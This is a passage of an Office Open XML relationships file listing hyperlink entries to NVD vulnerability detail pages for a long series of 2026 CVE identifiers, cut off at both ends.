Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId750" /><Relationship 